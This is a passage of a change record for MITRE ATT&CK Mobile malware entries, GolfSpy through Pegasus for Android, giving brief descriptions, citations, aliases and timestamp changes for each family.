+ "modified": "2025-04-25 14:40:37.700000+00:00", + "name": "GolfSpy", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) is Android spyware deployed by the group [Bouncing Golf](https://attack.mitre.org/groups/G0097).(Citation: Trend Micro Bouncing Golf 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0421", + "external_id": "S0421" + }, + { + "source_name": "Trend Micro Bouncing Golf 2019", + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign \u2018Bouncing Golf\u2019 Affects Middle East. 
Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "GolfSpy" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:37.700000+00:00\", \"old_value\": \"2025-04-16 21:22:12.846000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--20d56cd6-8dff-4871-9889-d32d254816de", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:43.242000+00:00", + "modified": "2025-04-25 14:40:16.979000+00:00", + "name": "Gooligan", + "description": "[Gooligan](https://attack.mitre.org/software/S0290) is a malware family that runs privilege escalation exploits on Android devices and then uses its escalated privileges to steal authentication tokens that can be used to access data from many Google applications. [Gooligan](https://attack.mitre.org/software/S0290) has been described as part of the Ghost Push Android malware family. 
(Citation: Gooligan Citation) (Citation: Ludwig-GhostPush) (Citation: Lookout-Gooligan)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0290", + "external_id": "S0290" + }, + { + "source_name": "Gooligan", + "description": "(Citation: Gooligan Citation) (Citation: Ludwig-GhostPush) (Citation: Lookout-Gooligan)" + }, + { + "source_name": "Ghost Push", + "description": "Gooligan has been described as being part of the Ghost Push Android malware family. (Citation: Ludwig-GhostPush) (Citation: Lookout-Gooligan)" + }, + { + "source_name": "Gooligan Citation", + "description": "Check Point Research Team. (2016, November 30). More Than 1 Million Google Accounts Breached by Gooligan. Retrieved December 12, 2016.", + "url": "http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/" + }, + { + "source_name": "Ludwig-GhostPush", + "description": "Adrian Ludwig. (2016, November 29). The fight against Ghost Push continues. Retrieved December 12, 2016.", + "url": "https://plus.google.com/+AdrianLudwig/posts/GXzJ8vaAFsi" + }, + { + "source_name": "Lookout-Gooligan", + "description": "Lookout. (2016, December 1). Ghost Push and Gooligan: One and the same. 
Retrieved December 12, 2016.", + "url": "https://blog.lookout.com/blog/2016/12/01/ghost-push-gooligan/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Gooligan", + "Ghost Push" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:16.979000+00:00\", \"old_value\": \"2025-04-16 21:22:04.607000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-09-03 20:08:00.241000+00:00", + "modified": "2025-04-25 14:40:47.835000+00:00", + "name": "Gustuff", + "description": "[Gustuff](https://attack.mitre.org/software/S0406) is mobile malware designed to steal users' banking and virtual currency credentials.(Citation: Talos Gustuff Apr 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0406", + "external_id": "S0406" + }, + { + "source_name": "Talos Gustuff Apr 2019", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . 
Retrieved September 3, 2019.", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Gustuff" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:47.835000+00:00\", \"old_value\": \"2025-04-16 21:22:16.804000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-17 20:15:22.110000+00:00", + "modified": "2025-04-25 14:40:36.765000+00:00", + "name": "HenBox", + "description": "[HenBox](https://attack.mitre.org/software/S0544) is Android malware that attempts to only execute on Xiaomi devices running the MIUI operating system. [HenBox](https://attack.mitre.org/software/S0544) has primarily been used to target Uyghurs, a minority Turkic ethnic group.(Citation: Palo Alto HenBox)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0544", + "external_id": "S0544" + }, + { + "source_name": "Palo Alto HenBox", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. 
Retrieved September 9, 2019.", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "HenBox" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:36.765000+00:00\", \"old_value\": \"2025-04-16 21:22:12.500000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--6447e3a1-ef4d-44b1-99d5-6b1c4888674f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:40.259000+00:00", + "modified": "2025-04-25 14:40:28.796000+00:00", + "name": "HummingWhale", + "description": "[HummingWhale](https://attack.mitre.org/software/S0321) is an Android malware family that performs ad fraud. (Citation: ArsTechnica-HummingWhale)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0321", + "external_id": "S0321" + }, + { + "source_name": "HummingWhale", + "description": "(Citation: ArsTechnica-HummingWhale)" + }, + { + "source_name": "ArsTechnica-HummingWhale", + "description": "Dan Goodin. (2017, January 23). Virulent Android malware returns, gets >2 million downloads on Google Play. 
Retrieved January 24, 2017.", + "url": "http://arstechnica.com/security/2017/01/virulent-android-malware-returns-gets-2-million-downloads-on-google-play/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:28.796000+00:00\", \"old_value\": \"2025-04-16 21:22:09.395000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-06-02 14:32:31.461000+00:00", + "modified": "2025-04-25 14:40:18.080000+00:00", + "name": "INSOMNIA", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) is spyware that has been used by the group Evil Eye.(Citation: Volexity Insomnia)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0463", + "external_id": "S0463" + }, + { + "source_name": "Volexity Insomnia", + "description": "A. Case, D. Lassalle, M. Meltzer, S. Koessel, et al.. (2020, April 21). Evil Eye Threat Actor Resurfaces with iOS Exploit and Updated Implant. 
Retrieved June 2, 2020.", + "url": "https://www.volexity.com/blog/2020/04/21/evil-eye-threat-actor-resurfaces-with-ios-exploit-and-updated-implant/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "INSOMNIA" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:18.080000+00:00\", \"old_value\": \"2025-04-16 21:22:05.067000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--172444ab-97fc-4d94-b142-179452bfb760", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:40:16.257000+00:00", + "name": "Judy", + "description": "[Judy](https://attack.mitre.org/software/S0325) is auto-clicking adware that was distributed through multiple apps in the Google Play Store. (Citation: CheckPoint-Judy)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0325", + "external_id": "S0325" + }, + { + "source_name": "Judy", + "description": "(Citation: CheckPoint-Judy)" + }, + { + "source_name": "CheckPoint-Judy", + "description": "CheckPoint. (2017, May 25). The Judy Malware: Possibly the largest malware campaign found on Google Play. 
Retrieved September 18, 2018.", + "url": "https://blog.checkpoint.com/2017/05/25/judy-malware-possibly-largest-malware-campaign-found-google-play/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:16.257000+00:00\", \"old_value\": \"2025-04-16 21:22:04.284000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--3bc1f0ad-ef11-4afc-83c0-fcffe08d4e50", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:43.815000+00:00", + "modified": "2025-04-25 14:40:23.854000+00:00", + "name": "KeyRaider", + "description": "[KeyRaider](https://attack.mitre.org/software/S0288) is malware that steals Apple account credentials and other data from jailbroken iOS devices. It also has ransomware functionality. (Citation: Xiao-KeyRaider)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0288", + "external_id": "S0288" + }, + { + "source_name": "KeyRaider", + "description": "(Citation: Xiao-KeyRaider)" + }, + { + "source_name": "Xiao-KeyRaider", + "description": "Claud Xiao. (2015, August 30). KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts to Create Free App Utopia. 
Retrieved December 12, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:23.854000+00:00\", \"old_value\": \"2025-04-16 21:22:07.456000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-07-15 20:20:58.846000+00:00", + "modified": "2025-04-25 14:40:26.424000+00:00", + "name": "Mandrake", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) is a sophisticated Android espionage platform that has been active in the wild since at least 2016. [Mandrake](https://attack.mitre.org/software/S0485) is very actively maintained, with sophisticated features and attacks that are executed with surgical precision.\n\n[Mandrake](https://attack.mitre.org/software/S0485) has gone undetected for several years by providing legitimate, ad-free applications with social media and real reviews to back the apps. 
The malware is only activated when the operators issue a specific command.(Citation: Bitdefender Mandrake)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0485", + "external_id": "S0485" + }, + { + "source_name": "oxide", + "description": "(Citation: Bitdefender Mandrake)" + }, + { + "source_name": "briar", + "description": "(Citation: Bitdefender Mandrake)" + }, + { + "source_name": "ricinus", + "description": "(Citation: Bitdefender Mandrake)" + }, + { + "source_name": "darkmatter", + "description": "(Citation: Bitdefender Mandrake)" + }, + { + "source_name": "Bitdefender Mandrake", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Mandrake", + "oxide", + "briar", + "ricinus", + "darkmatter" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:26.424000+00:00\", \"old_value\": \"2025-04-16 21:22:08.595000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--5ddf81ea-2c06-497b-8c30-5f1ab89a40f9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 
14:48:40.875000+00:00", + "modified": "2025-04-25 14:40:28.053000+00:00", + "name": "MazarBOT", + "description": "[MazarBOT](https://attack.mitre.org/software/S0303) is Android malware that was distributed via SMS in Denmark in 2016. (Citation: Tripwire-MazarBOT)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0303", + "external_id": "S0303" + }, + { + "source_name": "MazarBOT", + "description": "(Citation: Tripwire-MazarBOT)" + }, + { + "source_name": "Tripwire-MazarBOT", + "description": "Graham Cluley. (2016, February 16). Android users warned of malware attack spreading via SMS. Retrieved December 23, 2016.", + "url": "https://www.tripwire.com/state-of-security/security-data-protection/android-malware-sms/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:28.053000+00:00\", \"old_value\": \"2025-04-16 21:22:09.084000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-09-04 14:28:14.181000+00:00", + "modified": "2025-04-25 14:40:29.512000+00:00", + "name": "Monokle", + "description": "[Monokle](https://attack.mitre.org/software/S0407) is targeted, sophisticated mobile surveillanceware. 
It is developed for Android, but there are some code artifacts that suggests an iOS version may be in development.(Citation: Lookout-Monokle)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0407", + "external_id": "S0407" + }, + { + "source_name": "Lookout-Monokle", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Monokle" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "J\u00f6rg Abraham, EclecticIQ" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:29.512000+00:00\", \"old_value\": \"2025-04-16 21:22:09.753000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--23040c15-e7d8-47b5-8c16-8fd3e0e297fe", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:36.707000+00:00", + "modified": "2025-04-25 14:40:19.154000+00:00", + "name": "NotCompatible", + "description": "[NotCompatible](https://attack.mitre.org/software/S0299) is an Android malware family that was used between at least 2014 and 2016. It has multiple variants that have become more sophisticated over time. 
(Citation: Lookout-NotCompatible)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0299", + "external_id": "S0299" + }, + { + "source_name": "NotCompatible", + "description": "(Citation: Lookout-NotCompatible)" + }, + { + "source_name": "Lookout-NotCompatible", + "description": "Tim Strazzere. (2014, November 19). The new NotCompatible: Sophisticated and evasive threat harbors the potential to compromise enterprise networks. Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/11/19/notcompatible/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:19.154000+00:00\", \"old_value\": \"2025-04-16 21:22:05.573000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--ca4f63b9-a358-4214-bb26-8c912318cfde", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:44.540000+00:00", + "modified": "2025-04-25 14:40:40.325000+00:00", + "name": "OBAD", + "description": "OBAD is an Android malware family. (Citation: TrendMicro-Obad)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0286", + "external_id": "S0286" + }, + { + "source_name": "OBAD", + "description": "(Citation: TrendMicro-Obad)" + }, + { + "source_name": "TrendMicro-Obad", + "description": "Veo Zhang. (2013, June 13). 
Cybercriminals Improve Android Malware Stealth Routines with OBAD. Retrieved December 9, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-improve-android-malware-stealth-routines-with-obad/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:40.325000+00:00\", \"old_value\": \"2025-04-16 21:22:13.949000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--2074b2ad-612e-4758-adce-7901c1b49bbc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:45.155000+00:00", + "modified": "2025-04-25 14:40:16.618000+00:00", + "name": "OldBoot", + "description": "[OldBoot](https://attack.mitre.org/software/S0285) is an Android malware family. (Citation: HackerNews-OldBoot)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0285", + "external_id": "S0285" + }, + { + "source_name": "OldBoot", + "description": "(Citation: HackerNews-OldBoot)" + }, + { + "source_name": "HackerNews-OldBoot", + "description": "Sudhir K Bansal. (2014, January 28). First widely distributed Android bootkit Malware infects more than 350,000 Devices. 
Retrieved December 21, 2016.", + "url": "http://thehackernews.com/2014/01/first-widely-distributed-android.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:16.618000+00:00\", \"old_value\": \"2025-04-16 21:22:04.440000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--c709da93-20c3-4d17-ab68-48cba76b2137", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:43.527000+00:00", + "modified": "2025-04-25 14:40:39.221000+00:00", + "name": "PJApps", + "description": "[PJApps](https://attack.mitre.org/software/S0291) is an Android malware family. (Citation: Lookout-EnterpriseApps)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0291", + "external_id": "S0291" + }, + { + "source_name": "PJApps", + "description": "(Citation: Lookout-EnterpriseApps)" + }, + { + "source_name": "Lookout-EnterpriseApps", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. 
Retrieved December 19, 2016.", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:39.221000+00:00\", \"old_value\": \"2025-04-16 21:22:13.454000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-07-10 15:35:43.217000+00:00", + "modified": "2025-04-25 14:40:38.069000+00:00", + "name": "Pallas", + "description": "[Pallas](https://attack.mitre.org/software/S0399) is mobile surveillanceware that was custom-developed by [Dark Caracal](https://attack.mitre.org/groups/G0070).(Citation: Lookout Dark Caracal Jan 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0399", + "external_id": "S0399" + }, + { + "source_name": "Pallas", + "description": "(Citation: Lookout Dark Caracal Jan 2018)" + }, + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. 
Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Pallas" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:38.069000+00:00\", \"old_value\": \"2025-04-16 21:22:12.993000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:41.202000+00:00", + "modified": "2025-04-25 14:40:32.245000+00:00", + "name": "Pegasus for Android", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) is the Android version of malware that has reportedly been linked to the NSO Group. (Citation: Lookout-PegasusAndroid) (Citation: Google-Chrysaor) The iOS version is tracked separately under [Pegasus for iOS](https://attack.mitre.org/software/S0289).", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0316", + "external_id": "S0316" + }, + { + "source_name": "Pegasus for Android", + "description": "(Citation: Lookout-PegasusAndroid) (Citation: Google-Chrysaor)" + }, + { + "source_name": "Chrysaor", + "description": "(Citation: Lookout-PegasusAndroid) (Citation: Google-Chrysaor)" + }, + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). 
Pegasus for Android: the other side of the story emerges. Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + }, + { + "source_name": "Google-Chrysaor", + "description": "Rich Cannings et al.. (2017, April 3). An investigation of Chrysaor Malware on Android. Retrieved April 16, 2017.", + "url": "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Pegasus for Android", + "Chrysaor" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:32.245000+00:00\", 